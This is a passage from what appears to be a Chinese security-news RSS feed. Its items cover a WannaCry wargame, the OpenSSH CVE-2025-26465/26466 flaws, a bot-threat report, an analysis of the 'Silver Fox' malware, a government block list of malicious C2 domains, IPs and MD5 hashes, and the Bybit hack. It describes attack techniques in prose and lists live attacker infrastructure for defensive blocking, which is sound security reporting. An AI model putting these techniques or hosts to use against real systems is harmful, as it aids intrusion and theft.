title="1743582245986535.png" alt="图片5.png"/></p><p><span style="font-size: 20px;"><strong>以下为丈八网安“互动式勒索病毒推演演练”全貌：</strong></span><br/></p><p><strong><span style="font-size: 18px;">推演演练背景介绍——WannaCry勒索病毒入侵</span></strong></p><p>此次推演的想定设计以知名勒索病毒WannaCry的入侵为背景，当其通过漏洞攻击、钓鱼邮件等途径向企业渗透，作为该企业的CSO，面对威胁该如何排兵布阵？分别在预防阶段、应急阶段以及处置阶段进行哪些策略的选择和下发，才能达到“最佳”防御效果，是本次推演的核心目标。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743582259184399.png" title="1743582259184399.png" alt="图片6.png"/></p><p><strong><span style="font-size: 18px;">推演工具介绍——丈八兵棋推演系统</span></strong><br/></p><p>此次推演演练的工具为丈八兵棋推演系统，该系统依托丈八网安自主研发的孪生级数字仿真引擎，最大技术亮点在于其充分运用了离散事件数字仿真技术，以建模的方式低资源占用模拟大规模连续网络安全事件，从而构建网络攻防仿真专用沙盘。同时，该系统还引入人工智能技术，通过智能辅助决策与网络攻防智能体实现了“人在环内”与“人在环外”的双模式推演。</p><p>在此次推演演练中，其对事件所涉及的全域要素：企业内网资产模型、企业网络模型、人员行为模型、勒索病毒模型等进行了精准建模。</p><p>相较于网络靶场准专注对技术人员的技能训练，兵棋推演系统聚焦高层的战术决策能力训练，重视战术规划与决策逻辑，所以，该系统具备对攻击链、跨域影响的全局模拟能力，可实现对全局风险与策略的评估，有效检验和提升决策人员的宏观统筹和实时决策能力。</p><p><strong><span style="font-size: 18px;">三轮推演：攻防策略的命运抉择</span></strong></p><p>本次推演采用递进式实验设计，首轮展现 “无防护策略”下的企业勒索场景。WannaCry变种在8小时内感染37个节点，加密300GB核心数据。丈八网安技术团队通过动态调整 "推演时钟"，使现场专家在 2分钟内目睹从病毒渗透到数据损毁的完整攻击链，直观感受零防护状态下的企业损失。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743583694162805.png" title="1743583694162805.png" alt="微信图片_20250402164507.png"/></p><p>次轮与末轮推演分别验证专家和企业代表投票选出的防护策略。第二轮采用 "临时应急+缴纳赎金" 组合方案，病毒扩散速度降低68%，但仍造成41%数据损失；第三轮启用"事前防御+事中应急+事后恢复"全周期方案，通过零信任架构和AI行为分析系统，实现对勒索病毒的100% 拦截。<br/></p><p>本次推演在通用企业场景下实现网络攻击损失的量化评估，通过三轮递进式推演，验证了企业可以在有限的预算下，通过多次推演找到“最佳”防护策略。在安全事件发生前进行充分的推演验证，可帮助企业构建有效的主动防御体系。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743582289204595.png" title="1743582289204595.png" alt="图片8.png"/></p><p>丈八网安CEO、联合创始人王珩对推演环节进行技术解读，他表示：场景构建器、推演控制台、效能评估引擎是丈八兵棋推演系统的核心功能模块，系统的孪生级数字仿真技术确保模型搭建可以细化到每一个工具在攻防过程中的具体操作和效果，也可上升到宏观的战技法层面，可面向对象进行组件化建模，形成决策层专用的演练系统，它可以帮助安全决策人员从被动响应转向主动防御，从碎片分析转向全局掌控，从经验判断转向数据驱动，对构建网络空间安全战略优势而言意义重大。<br/></p><p>未来，丈八网安将构建常态化攻防演练机制，依托"丈八兵棋推演系统"，针对金融、医疗、智能制造等关键领域推出定制化安全推演服务。通过高仿真还原APT攻击链、勒索病毒传播、数据泄露等典型威胁场景，以实战化推演锻造网络安全战略决策能力，助力构建国家数字安全策略新高地。</p>]]></description> <pubDate>Wed, 02 Apr 2025 16:27:49 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[第八届西湖论剑网安大赛：AI融合实战，产教融合锻造网络安全“新质生产力” ——专访安恒信息高级副总裁、首席人才官苗春雨]]></title> <link><![CDATA[https://www.4hou.com/posts/1Mnm]]></link> <description><![CDATA[<p>在数字化浪潮席卷全球的当下，网络安全已成为保障经济社会稳定发展的重要基石。作为国内网络安全领域的重要赛事，西湖论剑·中国杭州网络安全技能大赛（下称西湖论剑大赛）自创办以来，备受瞩目。3月29日，第八届西湖论剑大赛决赛拉开帷幕。在这场高手云集的竞技盛宴中，安恒信息高级副总裁、首席人才官苗春雨作为大赛承办方主要负责人，接受了我们的专访，深度解读大赛创新逻辑与网络安全人才培育之道。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743581977208268.png" title="1743581977208268.png" alt="图片3.png"/></p><p><span style="font-size: 20px;"><strong>AI双重视角：从“赋能安全”到“安全赋能”</strong></span><br/></p><p>西湖论剑大赛已经成功举办了七届，今年是第八个年头，始终追求与时俱进、公平公正，赛题在多样性和贴近实战上做了很多设置。“今年，我们在AI与网络安全的融合上迈出了更深入的一步。”安恒信息高级副总裁、首席人才官苗春雨在采访中表示，本届大赛的创新点可概括为“双向融合”：一是以AI技术优化网络安全解决方案（AI for security），二是在攻防场景中强化AI自身的安全性（Security in AI）。</p><p>苗春雨介绍，在创新挑战赛中，大赛倡导参赛队伍用AI这种新兴的生产力来改善网络安全的一些技术场景，提出解决方案。同时，比赛过程中，大赛会更关注了AI本身的安全。因为网络安全是伴生性技术，是发展的底座，因此需要平衡网络安全和发展的关系。换言之，我们在广泛使用各种AI技术的同时，要关注这种技术本身的安全性。只有AI安全，才能真正保证依靠AI技术优化网络安全解决方案的可靠和稳定。</p><p>这一理念不仅适用于大赛，更应在整个网络安全行业中得到推广和实践。苗春雨表示，期望通过西湖论剑大赛，激发更多创新思维，推动AI技术在垂直产业领域的应用，同时强化AI自身的安全防护，实现真正的“安全赋能”。</p><p><span style="font-size: 20px;"><strong>国际化赛道：构建全球网络安全协作生态</strong></span></p><p>本届大赛自开赛以来，共吸引了436所高校和10余家企业的842支队伍、4169名网安英才参赛，并首次设立国际化赛道，吸引了不少海外高校的团队参赛。苗春雨坦言，本届大赛呈现出“国际化”的特性，不仅是西湖论剑大赛品牌影响力的拓展，更是网络安全技术生态的共建。</p><p>“网络安全不是割裂的，而是一个整体。海外选手的加入能促进攻防思路的交流和碰撞，也为国内选手提供了全球视野的参照。”苗春雨说。事实上，部分国际队伍的网络安全技术水平与国内队伍相比，还有一定的差距，特别是在实战性上，更为显著。但通过这样的交流，国内队伍在相互的切磋过程中，还能为海外的一些团队提供示范作用，逐步缩小国内外网安技术差异，促进全球网络安全共发展、共进步。</p><p><span style="font-size: 20px;"><strong>产教融合：从“赛事练兵”到“人才蓄水池”</strong></span></p><p>西湖论剑网安大赛已连续举办八年，累计吸引1.7万名选手参与，为行业输送了大量实战型人才。苗春雨认为这是多年来“产教融合”“产学合作”持续深化的成果。</p><p>安恒信息作为历届大赛的承办方，每月定期举办“安恒杯”月赛，赛前配套讲解和培训，赛后配套沙龙与赛题复盘，引导学生在实践中掌握最新攻防技术。苗春雨提到，网络安全是动态变化的，场景不断更新，新技术不断涌现，仅靠课堂知识远远不够。月赛机制让学生能持续接触真实场景，形成‘学习－实践－反馈’的闭环。</p><p>与往年一样，今年的大赛依旧采取政企协作模式。一些赛题采取政企联合出题、人才挑战创新的模式，致力于打通教育链、创新链、产业链，聚焦网络安全产业高质量发展需求，实现“产学合作”“产教融合”，共创科学可行的产业解决方案。同时，鼓励在校生与从业人员同台竞技，实现产学碰撞，以此提升网络安全人才的实战能力和团队协作能力。</p><p>面对AI技术的飞速发展，苗春雨坦言，大赛的挑战在于“如何复现动态变化的攻防场景”。他表示，西湖论剑网安大赛让更多的人关注网络安全产业、网络安全人才培养的本质、实战技术人才培养的内涵，但未来趋势在不断变化，大赛需要建立更加体系化、动态化、主动化的防御体系，不断迭代赛题，才能培养出适应时代变革的人才。</p><p>网络安全的核心始终是人与技术的共进。我们期待西湖论剑大赛能让更多网安人才在实战中“破茧”，成为数字时代的守护者！</p>]]></description> <pubDate>Wed, 02 Apr 2025 16:22:12 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[新的 OpenSSH 漏洞使 SSH 服务器面临 MitM 攻击和拒绝服务攻击的风险]]></title> <link><![CDATA[https://www.4hou.com/posts/qo57]]></link> <description><![CDATA[<p>OpenSSH 发布了安全更新，修复了两个漏洞，一个是 MitM 攻击漏洞，另一个是拒绝服务漏洞，其中一个漏洞是在十多年前引入的。Qualys 发现了这两个漏洞，并向 OpenSSH 的维护人员展示了其可利用性。</p><p>OpenSSH（开放安全外壳）是 SSH（安全外壳）协议的一个免费开源实现，它为不安全网络上的安全远程访问、文件传输和隧道传输提供加密通信。</p><p>作为世界上最广泛使用的工具之一，在企业环境、信息技术、开发运维、云计算和网络安全应用中，基于 Linux 和 Unix（包括 BSD、macOS）的系统中有着很高的采用率。</p><p><span style="font-size: 20px;"><strong>两个漏洞</strong></span></p><p>根据 CVE-2025-26465 跟踪的 MiTM 漏洞是在2014年12月发布 OpenSSH 6.8p1 时引入的，因此该问题在十多年内未被发现。</p><p>当启用“VerifyHostKeyDNS”选项时，该漏洞会影响 OpenSSH 客户端，允许威胁者执行 MitM 攻击。</p><p>无论 VerifyHostKeyDNS 选项设置为“yes”还是“no”，针对 OpenSSH 客户端（CVE-2025-26465）的攻击都能成功，不需要用户交互，也不依赖于 DNS 中是否存在 SSHFP 资源记录（SSH指纹）。</p><p>启用后，由于错误处理不当，攻击者可以通过在验证期间强制出现内存不足错误来欺骗客户端接受非法服务器的密钥。</p><p>通过拦截 SSH 连接并提供带有过多证书扩展的大 SSH 密钥，攻击者可以耗尽客户端的内存，绕过主机验证，劫持会话以窃取凭据、注入命令和泄露数据。</p><p>虽然“VerifyHostKeyDNS”选项在 OpenSSH 中默认是禁用的，但从2013年到2023年，它在 FreeBSD 上默认是启用的，这使得许多系统暴露在这些攻击之下。</p><p>第二个漏洞是 CVE-2025-26466，这是2023年8月发布的 OpenSSH 9.5p1 中引入的预认证拒绝服务漏洞。</p><p>这个问题源于密钥交换期间不受限制的内存分配，从而导致不受控制的资源消耗。</p><p>攻击者可以重复发送16字节的 ping 消息，这会迫使 OpenSSH 缓冲256字节的响应，而不会立即受到限制。</p><p>在密钥交换期间，这些响应将被无限期存储，从而导致内存消耗过多和 CPU 过载，从而可能导致系统崩溃。</p><p>利用 CVE-2025-26466 的后果可能没有第一个漏洞那么严重，但在身份验证之前利用它的事实保持了非常高的中断风险。</p><p><span style="font-size: 20px;"><strong>发布安全更新</strong></span></p><p>OpenSSH 团队本周发布了9.9p2版本，解决了这两个漏洞，因此建议相关用户应尽快迁移到该版本。此外，除非绝对必要，建议禁用 VerifyHostKeyDNS ，并依靠手动密钥指纹验证来确保 SSH 连接的安全。</p><p>对于 DoS 问题，建议管理员执行严格的连接速率限制，并监控 SSH 流量的异常模式，以便及早阻止潜在的攻击。</p>]]></description> <pubDate>Wed, 02 Apr 2025 12:00:00 +0800</pubDate> <author>胡金鱼</author> </item> <item> <title><![CDATA[瑞数信息《BOTS自动化威胁报告》正式发布]]></title> <link><![CDATA[https://www.4hou.com/posts/Zgo5]]></link> <description><![CDATA[<p>在数字化时代，BOTS自动化攻击如同一场无声的风暴，正以前所未有的态势席卷全球网络空间。为了让各行业更好地应对自动化威胁挑战，瑞数信息作为BOTS自动化攻击防护领域的专业厂商，多年来持续输出BOTS自动化威胁报告，为各行各业用户做好自动化攻击安全防护提供参考指南。</p><p>近日，瑞数信息正式发布《BOTS自动化威胁报告》（以下简称“报告”），从<strong>整体态势、攻击手段、攻击特征、威胁防护建议</strong>等多个方面进行深度分析，剖析多个行业的BOTS自动化攻击案例，并对2025年BOTS自动化威胁发展趋势做出了最新研判。</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743560653453047.png" title="1743560653453047.png" alt="图片1.png"/>报告指出，随着数字化转型深入和AI技术快速发展，2024年Bots自动化攻击呈现出新的特点和趋势。根据报告，全球65%的网络流量来自机器人程序，其中恶意Bots占比高达52%。攻击手段正经历从“脚本小子”到“AI集团军”的质的飞跃，传统防御体系面临前所未有的挑战。</p><p><strong>从行业分布来看</strong>，<strong>金融</strong>行业首当其冲，成为恶意机器人攻击的重灾区。恶意流量占比高达61.2%，凸显了金融领域在数字化进程中面临的巨大安全挑战。<strong>政务服务、互联网、运营商</strong>等是攻击的重点领域，恶意流量占比均超过57%。值得关注的是，<strong>票务</strong>服务行业首次进入重点关注领域，成为Bots攻击新的重灾区，恶意机器人占比超过54%，这反映出随着经济复苏和文旅消费升温，自动化攻击的触角已伸向了更多民生领域。</p><p><strong>从攻击目标来看</strong>，<strong>API接口</strong>和数据查询类业务成为了攻击者的首选。API接口调用攻击占比高达25.6%，首次超过公开数据查询。这一变化反映了微服务架构普及和业务系统解耦背景下，API作为连接各个系统组件的关键纽带，其安全防护的重要性日益凸显。需要指出的是，在AI技术的加持下，攻击者对业务逻辑的理解和利用能力显著提升，使得攻击更具针对性和隐蔽性，同时AI服务接口和数字身份服务成为新兴攻击目标。<br/></p><p><strong>从攻击手段来看</strong>，攻击手段的智能化升级更是令人担忧。<strong>AI驱动的攻击已占恶意流量的35%</strong>，生成式AI与自动化工具的深度融合，使得攻击手段呈现出智能化、场景化和产业化的特征。攻击者利用AI技术生成更具欺骗性的内容，自动规划攻击链路，动态调整攻击策略，甚至能够模拟真实用户的行为，从而突破传统防御体系的边界。</p><p>生成式AI技术的快速发展和普及，为自动化攻击注入了强大的动力。攻击者将AI技术深度融入自动化攻击工具中，不仅能够生成复杂的恶意代码、深度伪造的语音和视频等内容，还能在漏洞挖掘、利用开发到渗透路径规划等方面发挥关键作用。</p><p>通过学习海量的攻防知识，AI驱动的攻击工具表现出前所未有的智能化和拟人化特征，能够自动规划攻击链路、动态调整攻击策略、智能规避检测系统，在模拟“正常人” 行为和APT组织攻击行为等方面都达到了新的高度。这种新一代的自动化攻击方式正在突破传统防御体系的边界，攻击的准确性和成功率显著提升。</p><p><strong><span style="font-size: 18px;">对于2025攻击威胁发展趋势，报告强调</span></strong>：</p><p><strong>·</strong>生成式AI武器化让网络空间“易攻难守”将成为常态；</p><p><strong>·</strong>构建网络韧性将成为行业共识；</p><p><strong>·</strong>勒索软件攻击变得更加智能化和常态化；</p><p><strong>·</strong>深度伪造引发的大规模欺诈风险将成倍增长；</p><p><strong>·</strong>基于AI的高级Bots自动化工具已具备类似真实用户的行为特征</p><p><strong>·</strong>API攻击和供应链正在成为网络安全又一“软肋”。</p><p>众多新技术的崛起令安全威胁以我们无法完全预见、管理或阻止的方式进行。2025年，可能成为一个转折点 —— 现在的问题已不在于是否需要采取行动，而是我们是否能及时采取行动。面对网络世界的错综复杂，预见风险、及时行动，才能化被动为主动，打赢网络安全“持久战”。</p>]]></description> <pubDate>Wed, 02 Apr 2025 10:37:36 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[银狐超进化！引爆2025开年最大黑产攻击]]></title> <link><![CDATA[https://www.4hou.com/posts/YZn2]]></link> <description><![CDATA[<p>近日，微步发现并参与处置了多起大型央企、医疗机构等被黑产大规模拉群钓鱼、诈骗钱财的网络安全事件。经过关联分析和综合研判后，微步认为“银狐”最新变种正在集中引发大规模网络攻击，广泛影响中大型企业，累计受影响员工数千人以上，堪称2025开年以来最大规模的黑产攻击。</p><p>本次攻击发现和处置难度前所未有，原因如下：</p><p>1. 企业IM成钓鱼攻击“集散地”，难以分辨。攻击者大量使用企业IM（如企业微信）拉群传播恶意文件和诈骗二维码，单位员工分辨较难，容易受骗，因此几乎每起攻击事件都会引发钱财损失；</p><p>2. 钓鱼途径多样，诱饵紧贴时事、高度逼真。攻击者用以仿冒钓鱼的主题包括但不限于税务局稽查局、DeepSeek、谷歌在线翻译、公共电子邮件登录入口，甚至伪装为成人网站，详情见后文。</p><p>3. 黑产攻击资源丰富，攻击规模大、时间持久。恶意域名更新频次极高，恶意样本变种快、分布广，影响企业数量极多，仅限制部分ip黑名单不能完全防范。</p><p>4. 极难发现和清理，攻击反复。“银狐”最新变种在免杀对抗和驻留技术上有极大提升，导致部分单位的攻击事件反复出现。</p><p><span style="font-size: 20px;"><strong>一、近期银狐攻击概览</strong></span></p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489303851473.png" title="1743489183787426.png" alt="image.png"/></p><p><span style="font-size: 20px;"><strong>二、钓鱼手法的超进化</strong></span></p><p>黑产团伙在投递木马程序时，以财税相关主题诱饵文件和或部署各类软件仿冒站点为主，使大量企业受害。</p><p>在财税相关主题诱饵上，近期主要以pdf，html文件为主，伪装为税务局稽查局向辖区企业进行税务抽查，投递虚假公告，诱导受害者访问木马下载地址，下载木马进行远控：</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489304172172.png" title="1743489217147555.png" alt="image001.png"/></p><p>在部署各类软件仿冒站点时，攻击者进行模板化部署，钓鱼网站更新频繁多样，近期更以DeepSeek等热点AI工具为主题分发携带后门的木马程序，结合搜索引擎SEO技术，使钓鱼网站位列搜索引擎关键字结果前几名，受害者难以分辨。 </p><p>仅以“安装Flash插件钓鱼模板进行投毒”手法为例，3月份就新增的钓鱼站点多达69个：</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489302208535.png" title="1743489302208535.png" alt="image.png"/></p><p>此外攻击者紧跟时事，发布了伪装成DeepSeek主题的钓鱼网站模板：</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489384514238.png" title="1743489384514238.png" alt="image011.png"/><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489400139041.png" title="1743489400139041.png" alt="image013.png"/></p><p>同时，企业受害员工电脑被控，通过微信、企业微信等IM拉群、群发链接或者有毒附件的攻击事件也大量发生：</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489426543875.png" title="1743489426543875.png" alt="image015.png"/></p><p>部分受影响企业的失陷资产在暗网被售卖，导致反复出现安全事件：</p><p style="text-align: center;"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489462134118.png" title="1743489462134118.png" alt="image017.png"/></p><p><span style="font-size: 20px;"><strong>三、免杀技术的超进化</strong></span></p><p>（1）大量的白加黑应用</p><p>银狐采用白加黑手法加载同目录下的黑dll文件，通过黑dll拉起同目录下的子进程并进行解密，以隐藏银狐的上线模块。</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489503320385.png" title="1743489503320385.png" alt="image019.png"/></p><p>（2）新型注入方法使用</p><p>详情如下图：</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489528163955.png" title="1743489528163955.png" alt="image021.png"/></p><p></p><p>（3）使用多重注入形成断进程链的同时，构建注入的白链</p><p>详情如下图</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489557609741.png" title="1743489557609741.png" alt="image023.png"/></p><p>（4）使用rpc远程创建计划任务和服务进行持久化</p><p>手法见《<a href="https://mp.weixin.qq.com/s/VyOKU0uxTTV_6-l4hVm3UQ" target="dtf">银狐叒进化，溯源不了，清理不掉！</a>》但更为完善。</p><p>（5）远控工具多样化</p><p>目前银狐木马采用了各类魔改的gh0st和多样化的商业远控，如IPGuard，固信等。</p><p><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250401/1743489590205686.png" title="1743489590205686.png" alt="image025.png"/></p><p>（5）自保和对抗能力增强</p><p>此次银狐会使用多个驱动保护自身不被结束，其关联的文件不被删除，其创建的持久化项不被清理，确保驻留。</p><p><span style="font-size: 20px;"><strong>四、应对措施</strong></span></p><p>微步建议广大企业安全运营团队立刻采取措施：</p><p>1. 积极应对活跃黑产，成立专项运营小组、制定计划；</p><p>2. 应用有效的EDR技术，快速发现威胁并进行响应；</p><p>3. 提高员工安全意识，警惕伪装成内部员工拉群的钓鱼攻击，扫描转账前一定要多方核实，提高特定部门尤其是财务的安全意识宣导。</p><p><br/></p>]]></description> <pubDate>Tue, 01 Apr 2025 14:40:40 +0800</pubDate> <author>企业资讯</author> </item> <item> <title><![CDATA[国家网络安全通报中心：重点防范境外恶意网址和恶意IP]]></title> <link><![CDATA[https://www.4hou.com/posts/XP0g]]></link> <description><![CDATA[<p>中国国家网络与信息安全信息通报中心发现一批境外恶意网址和恶意IP，境外黑客组织利用这些网址和IP持续对中国和其他国家发起网络攻击。这些恶意网址和IP都与特定木马程序或木马程序控制端密切关联，网络攻击类型包括建立僵尸网络、挖矿木马、远程控制、后门利用等，对中国国内联网单位和互联网用户构成重大威胁，部分活动已涉嫌刑事犯罪。相关恶意网址和恶意IP归属地主要涉及：美国、法国、荷兰、瑞士等。主要情况如下：</p><p><span style="font-size: 20px;"><strong>一、恶意地址信息</strong></span></p><p><strong><span style="font-size: 18px;">（一）恶意地址：mo.t1linux.com</span></strong></p><p>关联IP地址：216.152.18.8</p><p>归属地：美国/伊利诺伊州/芝加哥</p><p>威胁类型：挖矿木马</p><p>病毒家族：lucifer</p><p>描述：这是一种跨平台、支持多种架构、DDoS与挖矿功能混合的恶意程序，主要借助IoT设备漏洞如Dasan GPON光纤路由器越权和远程命令执行漏洞CVE-2018-10561等进行传播。其包含下载、执行等常见的远程命令和控制功能，能够对指定目标发起DDoS攻击，并借助XMRig开源程序实现门罗币挖取。</p><p><strong><span style="font-size: 18px;">（二）恶意地址：pool.dudiito.dev</span></strong></p><p>关联IP地址：5.78.130.39</p><p>归属地：美国/俄勒冈州/希尔斯伯勒</p><p>威胁类型：挖矿木马</p><p>病毒家族：monero</p><p>描述：这是一种可在Windows、Linux、MacOS、Android等多个平台运行的开源门罗币挖矿木马，主要通过网络下载方式传播，利用感染主机进行挖矿牟利。</p><p><strong><span style="font-size: 18px;">（三）恶意地址：ddos.howardwang2312.com</span></strong></p><p>关联IP地址：91.216.169.28  </p><p>归属地：美国/加利福尼亚州/东洛杉矶   </p><p>威胁类型：僵尸网络</p><p>病毒家族：moobot</p><p>描述：这是一种Mirai僵尸网络的变种，常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等进行入侵，攻击者在成功入侵设备后将下载MooBot的二进制文件并执行，进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。</p><p><strong><span style="font-size: 18px;">（四）恶意地址：9cpanel.hackcrack.io</span></strong></p><p>关联IP地址：147.124.205.158    </p><p>归属地：美国/俄勒冈州/本德</p><p>威胁类型：后门</p><p>病毒家族：NjRAT</p><p>描述：该恶意地址关联到NjRAT病毒家族样本，部分样本程序的MD5值为32b78ad1c0d9d1a0f3761dc7f8bed912。该网络后门是一种由 C#编写的远程访问木马，具备屏幕监控、键盘记录、密码窃取、文件管理（上传、下载、删除、重命名文件）、进程管理（启动或终止进程）、远程激活摄像头、交互式 Shell（远程命令执行）、访问特定 URL 及其它多种恶意控制功能，通常通过移动存储介质感染、网络钓鱼邮件或恶意链接进行传播，用于非法监控、数据窃取和远程控制受害者计算机。</p><p><strong><span style="font-size: 18px;">（五）恶意地址：fidapeste2.duckdns.org</span></strong></p><p>关联IP地址：192.169.69.26</p><p>归属地：美国/华盛顿州/西雅图</p><p>威胁类型：后门</p><p>病毒家族：NjRAT</p><p>描述：该恶意地址关联到NjRAT病毒家族样本，部分样本程序的MD5值为b5cbf7365e0b43b84497b60f105564f2。该网络后门是一种由 C#编写的远程访问木马，具备屏幕监控、键盘记录、密码窃取、文件管理（上传、下载、删除、重命名文件）、进程管理（启动或终止进程）、远程激活摄像头、交互式 Shell（远程命令执行）、访问特定 URL 及其它多种恶意控制功能，通常通过移动存储介质感染、网络钓鱼邮件或恶意链接进行传播，用于非法监控、数据窃取和远程控制受害者计算机。</p><p><strong><span style="font-size: 18px;">（六）恶意地址：banthis.su</span></strong></p><p>关联IP地址：185.142.53.6</p><p>归属地：法国/巴黎</p><p>威胁类型：僵尸网络</p><p>病毒家族：catddos</p><p>描述：Catddos病毒家族主要通过IoT设备的N-Day漏洞进行传播，已公开样本包括CVE-2023-46604、CVE-2021-22205等，该恶意地址是相关病毒家族近期有效活跃的回连地址。</p><p><strong><span style="font-size: 18px;">（七）恶意地址：62.210.28.199</span></strong></p><p>归属地：法国/巴黎</p><p>威胁类型：远程控制</p><p>病毒家族：Meterpreter</p><p>描述：该恶意地址关联到Meterpreter病毒家族样本，部分样本程序的MD5值为91a77e0d2d4b9bb98b15c78bc4084115。Meterpreter通常被用于在渗透测试和漏洞利用过程中执行攻击操作，常见的攻击传播方式包括漏洞攻击、鱼叉钓鱼等。</p><p><strong><span style="font-size: 18px;">（八）恶意地址：seyfhg.work.gd</span></strong></p><p>关联IP地址：146.19.188.249 </p><p>归属地：荷兰/北荷兰省/阿姆斯特丹</p><p>威胁类型：僵尸网络</p><p>病毒家族：moobot</p><p>描述：这是一种Mirai僵尸网络的变种，常借助各种IoT设备漏洞例如CVE-2015-2051、CVE-2018-6530、CVE-2022-26258、CVE-2022-28958等进行入侵，攻击者在成功入侵设备后将下载MooBot的二进制文件并执行，进而组建僵尸网络并可能发起DDoS(分布式拒绝服务)攻击。</p><p><strong><span style="font-size: 18px;">（九）恶意地址：501799.prohoster.biz</span></strong></p><p>关联IP地址：185.212.130.11</p><p>归属地：荷兰/北荷兰省/阿姆斯特丹</p><p>威胁类型：后门</p><p>病毒家族：DCRat</p><p>描述：该恶意地址关联到多个DcRat病毒家族样本，部分样本程序MD5值为eba23ee4fa3441dd8972973ac7665007。该网络后门是一种远程访问木马，最早于2018年发布，能够窃取用户隐私信息（系统信息、账号信息等），根据远程指令执行shell命令、截图、记录键盘、窃取cookie、数据上传、操纵剪贴版、删除目录、设置壁纸、发起DDoS攻击等多种功能。</p><p><strong><span style="font-size: 18px;">（十）恶意地址：176.96.131.55</span></strong></p><p>归属地：瑞士</p><p>威胁类型：后门</p><p>病毒家族：Quasar</p><p>描述：该恶意地址关联到Quasar病毒家族样本，部分样本程序MD5值为a6de2fc13d573539a75889378af7abc0。这是一种基于.NET Framework的远程管理木马，提供文件管理、进程管理、远程桌面、远程shell、上传下载、获取系统信息、重启关机、键盘记录、窃取密码、注册表编辑等功能，常被攻击者用于信息窃取和远程控制受害者主机。</p><p><span style="font-size: 20px;"><strong>二、排查方法</strong></span></p><p>（一）详细查看分析浏览器记录以及网络设备中近期流量和DNS请求记录，查看是否有以上恶意地址连接记录，如有条件可提取源IP、设备信息、连接时间等信息进行深入分析。</p><p>（二）在本单位应用系统中部署网络流量检测设备进行流量数据分析，追踪与上述网络和IP发起通信的设备网上活动痕迹。</p><p>（三）如果能够成功定位到遭受攻击的联网设备，可主动对这些设备进行勘验取证，进而组织技术分析。</p><p><span style="font-size: 20px;"><strong>三、处置建议</strong></span></p><p>（一）对所有通过社交平台或电子邮件渠道接收的文件和链接保持高度警惕，重点关注其中来源未知或不可信的情况，不要轻易信任或打开相关文件。</p><p>（二）及时在威胁情报产品或网络出口防护设备中更新规则，坚决拦截以上恶意网址和恶意IP的访问。</p><p>（三）向有关部门及时报告，配合开展现场调查和技术溯源。</p><p style="text-align: right;"><span style="color: rgb(216, 216, 216);">文章来源自：国家网络安全通报中心</span></p>]]></description> <pubDate>Tue, 01 Apr 2025 12:01:00 +0800</pubDate> <author>胡金鱼</author> </item> <item> <title><![CDATA[Lazarus通过Safe{Wallet}开发机器入侵了Bybit]]></title> <link><![CDATA[https://www.4hou.com/posts/RXnV]]></link> <description><![CDATA[<p>安全研究人员发现，朝鲜<span style="color: rgb(7, 7, 7); font-family: Georgia, "Times New Roman", Times, serif; font-size: 18px; text-wrap: wrap; background-color: rgb(255, 255, 255);">Lazarus</span>黑客在入侵多sig钱包平台Safe{wallet}的开发人员设备后，从Bybit窃取了15亿美元。</p><p>Bybit首席执行官分享了Sygnia和Verichains的两项调查的结论，这两项调查都发现攻击源自Safe{Wallet}的基础设施。此次攻击通过向app.safe注入恶意JavaScript专门针对Bybit。</p><p>global，由Bybit的签名者访问，有效载荷被设计为只有在满足某些条件时才会激活。这种选择性执行确保了后门不被普通用户发现，同时危及高价值目标。</p><p>根据对Bybit签署人机器的调查结果以及在Wayback Archive上发现的缓存恶意JavaScript有效负载，<span style="text-wrap: wrap;"><span style="text-wrap: wrap;">Sygnia</span></span>认为AWS S3或CloudFront帐户/安全的API密钥。环球公司很可能被泄露或受损。</p><p>“在恶意交易执行并发布两分钟后，新版本的JavaScript资源被上传到Safe{Wallet}的AWS S3桶中。这些更新版本已经删除了恶意代码。”Sygnia补充道。</p><p>Sygnia还发现，恶意JavaScript代码（针对Bybit的以太坊Multisig冷钱包）来自Safe{Wallet}的AWS S3桶，用于将Bybit的加密资产重定向到攻击者控制的钱包，并在2月21日攻击前两天被修改。事件发生后，叙利亚对Bybit的基础设施进行了调查，没有发现任何被入侵的证据。</p><p>安全生态系统基金会在一份声明中证实了他们的结论，该声明透露，攻击是通过首先入侵<span style="text-wrap: wrap;">Safe{wallet}</span>开发人员的机器进行的，该机器为威胁者提供了访问Bybit运营的帐户的权限。</p><p>自事件发生以来，Safe{Wallet}团队已经在以太坊主网上恢复了Safe{Wallet}，并分阶段推出，暂时删除了本机分类帐集成，即Bybit加密抢劫中使用的签名设备/方法。</p><p>恢复Safe{Wallet}服务的分阶段推出还增加了进一步的安全措施，包括增强的监控警报和对交易散列、数据和签名的额外验证。</p><p><span style="text-wrap: wrap;">Safe{Wallet}</span>的团队表示，他们已经完全重建和重新配置了所有基础设施，并旋转了所有凭据，以确保攻击向量已被删除，不能在未来的攻击中使用。</p><p>尽管外部安全研究人员进行的取证审查没有发现外管局智能合约或其前端和服务的源代码存在漏洞，但建议用户在签署交易时保持警惕。</p>]]></description> <pubDate>Tue, 01 Apr 2025 12:00:00 +0800</pubDate> <author>胡金鱼</author> </item> <item> 